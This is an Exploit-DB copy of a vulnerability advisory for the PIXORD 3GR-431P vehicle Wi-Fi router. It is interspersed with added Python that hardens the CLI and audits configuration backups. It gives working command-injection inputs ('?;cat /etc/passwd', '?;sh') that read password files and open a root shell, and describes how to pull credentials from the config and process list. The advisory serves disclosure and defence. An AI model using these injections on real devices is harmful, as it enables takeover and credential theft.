exploit-db-mirror/exploits/hardware/remote/38370.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple Vulnerabilities]
# Date: May 01, 2015 [No response from Vendor till date]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
# Version: [Model Name :3GR-431P]
[Software Version :RTA-A001_02]
[Wireless Driver Version :2.6.0.0]
*Vehicle 3G Wi-Fi Router - PIXORD *
http://www.pixord.com/en/products_show.php?show=17
*Device Info *
Model Name :3GR-431P
Software Version :RTA-A001_02
Wireless Driver Version :2.6.0.0
The PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless
router. It supports Internet access via 3G and receives position
information from GPS. The 3GR-431P also provides two Ethernet ports for LAN
connectivity and an 802.11n Wi-Fi access point for WLAN connectivity.
The 3GR-431P can be installed in vehicles, so that passengers can use a
laptop or smartphone over Wi-Fi to browse the Internet on the go. The
Ethernet port can also connect an IP camera to provide real-time monitoring.
Vulnerability Impact: Easy and full device compromise. Access to configured
keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user /
vehicle via camera / connected devices.
*Multiple Security Vulnerabilities *
*1. OS command injection *
$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
Vehicle 3G Wi-Fi Router
Login: admin
Password:
>
> ?
mobile3G
mobileGPS
model
reboot
restoredefault
version
As seen above, only a few specific, functional options are available for
device management.
However, we can bypass this restricted menu and dump the password hashes easily:
> ?;cat /etc/passwd
sh: ?: not found
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
> exit
Note that this also applies when the non-admin 'user' or 'support' account
logs in over Telnet.
The web application lacks strict input validation and is hence vulnerable to
OS command injection.
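As an added illustration, not code from the advisory or from PiXORD, the following Python contrasts what the `sh: ?: not found` output implies the device does (the raw menu line reaches `sh -c`, so `;` splits it into two commands) with an allowlist dispatcher that validates the word and calls a handler function directly. The six menu names are those from the `?` listing above; the model and version strings are the device info from the top of the advisory, and the other handler outputs are constructed placeholders.

```python
import re
from typing import Callable, Dict, Tuple

# The six menu entries the advisory shows in the Telnet CLI's '?' output.
# Model/version strings come from the advisory's device info; the rest are placeholders.
MENU: Dict[str, Callable[[], str]] = {
    "mobile3G":       lambda: "3G status: (constructed placeholder)",
    "mobileGPS":      lambda: "GPS fix: (constructed placeholder)",
    "model":          lambda: "3GR-431P",
    "reboot":         lambda: "reboot scheduled (constructed placeholder)",
    "restoredefault": lambda: "factory reset scheduled (constructed placeholder)",
    "version":        lambda: "RTA-A001_02",
}


def vulnerable_shell_line(line: str) -> str:
    """What the advisory's output implies the device does: the raw line reaches
    'sh -c', so the shell splits '?;cat /etc/passwd' at ';' and runs both halves.
    Nothing is executed here; the function only returns the string a shell would get."""
    return line


# Hardened path: a menu name is a bare alphanumeric word, nothing else.
_MENU_WORD = re.compile(r"[A-Za-z0-9]+")


def hardened_dispatch(line: str) -> Tuple[bool, str]:
    """Allowlist dispatcher. Returns (accepted, output_or_reason).
    Input is validated before lookup, and the handler is a function call, never a shell."""
    cmd = line.strip()
    if not _MENU_WORD.fullmatch(cmd):
        # Shell metacharacters (; | & $ ` etc.) or embedded whitespace: reject, never pass on.
        return False, "rejected: command may contain only letters and digits"
    handler = MENU.get(cmd)
    if handler is None:
        return False, f"rejected: unknown command {cmd!r}"
    return True, handler()


def help_text() -> str:
    """Equivalent of the '?' menu listing, in the order the device prints it."""
    return "\n".join(sorted(MENU, key=str.lower))


if __name__ == "__main__":
    for attempt in ("version", "?;cat /etc/passwd", "?;sh", "restoredefault"):
        print(f"{attempt!r:25} -> {hardened_dispatch(attempt)}")
```

The important property is that validation happens before any lookup and that the accepted word is only ever used as a dictionary key; there is no string that a user can type which reaches a shell, so the `?;cat /etc/passwd` and `?;sh` inputs from the advisory are refused outright.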
*2. Configuration not secured properly / AuthZ issues *
The device has three users: admin, support and user.
Apparently there is no separation of privileges between these three users
when accessing the device over HTTP(S); all options are available to all three.
This allows 'user' / 'support' to access the device configuration file,
RT2880_Settings.dat. The configuration backup contains base64-encoded login
passwords, clear-text WPA keys and other sensitive information.
*Sensitive information in configuration file - *
*more RT2880_Settings.dat *
#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=<admin_password_here>=
Login2=support
Password2=<support_password_here>==
Login3=user
Password3=<user_password_here>==
OperationMode=1
Platform=RT3352
.....
<snip>
.....
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
wan_l2tp_server=l2tp_server
wan_l2tp_user=l2tp_user
wan_l2tp_pass=l2tp_passwd
.....
<snip>
.....
wan_pptp_server=pptp_server
wan_pptp_user=pptp_user
wan_pptp_pass=pptp_passwd
.....
<snip>
.....
DDNS=
DDNSAccount=<ddns_account_name_here>
DDNSPassword=<ddns_password_here>
CountryRegion=
CountryRegionABand=
CountryCode=
BssidNum=1
SSID1=PiXORD
WirelessMode=9
.....
<snip>
.....
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=<wsc_key_here>
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
AuthMode=WPAPSKWPA2PSK
EncrypType=TKIPAES
RekeyInterval=3600
RekeyMethod=TIME
PMKCachePeriod=10
WPAPSK1=<WPA_PSK_Key_here>
DefaultKeyID=2
Key1Type=0
Key1Str1=
Key2Type=0
Key2Str1=
Key3Type=0
Key3Str1=
Key4Type=0
Key4Str1=
WapiPskType=0
.....
<snip>
.....
WdsEnable=0
WdsEncrypType=NONE
WdsList=
WdsKey=
WirelessEvent=0
RADIUS_Server=0
RADIUS_Port=1812
RADIUS_Key=
RADIUS_Acct_Server=
RADIUS_Acct_Port=1813
RADIUS_Acct_Key=
.....
<snip>
.....
wan_3g_apn=public
wan_3g_dial=*99#
wan_3g_user=
wan_3g_pass=
<snip>
RADIUS_Key1=<radius_key_here>
.....
<snip>
.....
Also, as observed in point 1 above, all the users have UID 0, i.e. root-level
privileges on the device:
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
The application should ideally assign specific privileges to each user and
enforce strict access control.
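An added example, not part of the advisory, of how an auditor can triage a configuration backup like the one above: it parses the `key=value` format of RT2880_Settings.dat, flags every populated credential-like setting, and base64-decodes the ones with the `=` padding the `Password`/`Password2`/`Password3` values show, which demonstrates that the encoding is not protection. The sample config is constructed here with made-up values; the exclusion list for keys that merely contain "key"/"psk" (DefaultKeyID, Key1Type, RekeyMethod, WapiPskType) is an assumption drawn from the key names in the dump.

```python
import base64
import binascii
import re
from typing import Dict, Optional, Tuple

# Constructed sample in the key=value style of RT2880_Settings.dat; every value below is made up.
SAMPLE_CONFIG = """#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=c2VjcmV0MQ==
Login2=support
Password2=c2VjcmV0Mg==
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
DDNSPassword=ddns-pass
AuthMode=WPAPSKWPA2PSK
RekeyMethod=TIME
WPAPSK1=correct-horse-battery
DefaultKeyID=2
Key1Type=0
Key1Str1=
RADIUS_Key=
RADIUS_Key1=radius-shared
"""

# Keys whose value is credential material, minus the RT2880 keys that merely contain
# 'key'/'psk' but hold a mode or counter (DefaultKeyID, Key1Type, RekeyMethod, WapiPskType).
SECRET_KEY = re.compile(r"pass(word|wd)?|psk|key|secret", re.IGNORECASE)
NOT_SECRET = re.compile(r"(ID|Type|MGMT|Method|Interval|Num)$", re.IGNORECASE)


def parse_config(text: str) -> Dict[str, str]:
    """Parse key=value lines; '#' comments and the bare 'Default' section marker are skipped."""
    cfg: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def decode_if_base64(value: str) -> Optional[str]:
    """Return the decoded text if the value is well-formed base64, else None.
    The trailing '=' padding on the advisory's Password fields is the tell."""
    if not value or len(value) % 4:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-8", errors="replace")


def audit_secrets(text: str) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map each populated credential-like key to (stored value, base64-decoded value or None)."""
    findings: Dict[str, Tuple[str, Optional[str]]] = {}
    for key, value in parse_config(text).items():
        if not value or not SECRET_KEY.search(key) or NOT_SECRET.search(key):
            continue
        findings[key] = (value, decode_if_base64(value))
    return findings


if __name__ == "__main__":
    for key, (stored, decoded) in audit_secrets(SAMPLE_CONFIG).items():
        print(f"{key:16} stored={stored!r:24} decoded={decoded!r}")
```

Run against a real backup, the output is the list of settings that must be treated as compromised once the file has been downloadable by any of the three accounts: the WPA PSK, the RADIUS shared secret, the PPPoE/L2TP/PPTP and DDNS credentials, and the three login passwords, which fall out of the base64 step in clear text.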
*3. Application does not secure configured passwords (HTTPS) *
Masked passwords can be retrieved from the frame/page source (inspect element)
and / or by intercepting the request with a proxy.
The application should mask/censor (*****) the passwords, keys and any
other crucial pieces of configuration and must not send the values in
clear text.
*4. Program / Scripts running in an insecure manner - leaking clear-text passwords in process information *
After logging in to the device over Telnet, we can drop into a shell via the
OS command injection described in point 1.
> ?;sh
sh: ?: not found
Enter 'help' for a list of built-in commands.
BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)
#
Checking the running processes reveals a system program, *inadyn*, which
apparently is the DDNS update client, leaking a valid username and
password in clear text.
# ps aux
PID USER VSZ STAT COMMAND
1 admin 1768 S init
2 admin 0 RWN [ksoftirqd/0]
.....
<snip>
.....
2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>* -a *<ddns_domain_here>*
4050 admin 1768 R ps aux
Programs should be run securely, without passing credentials and other sensitive
parameter values as clear-text command-line arguments.
--
Best Regards,
Karn Ganeshen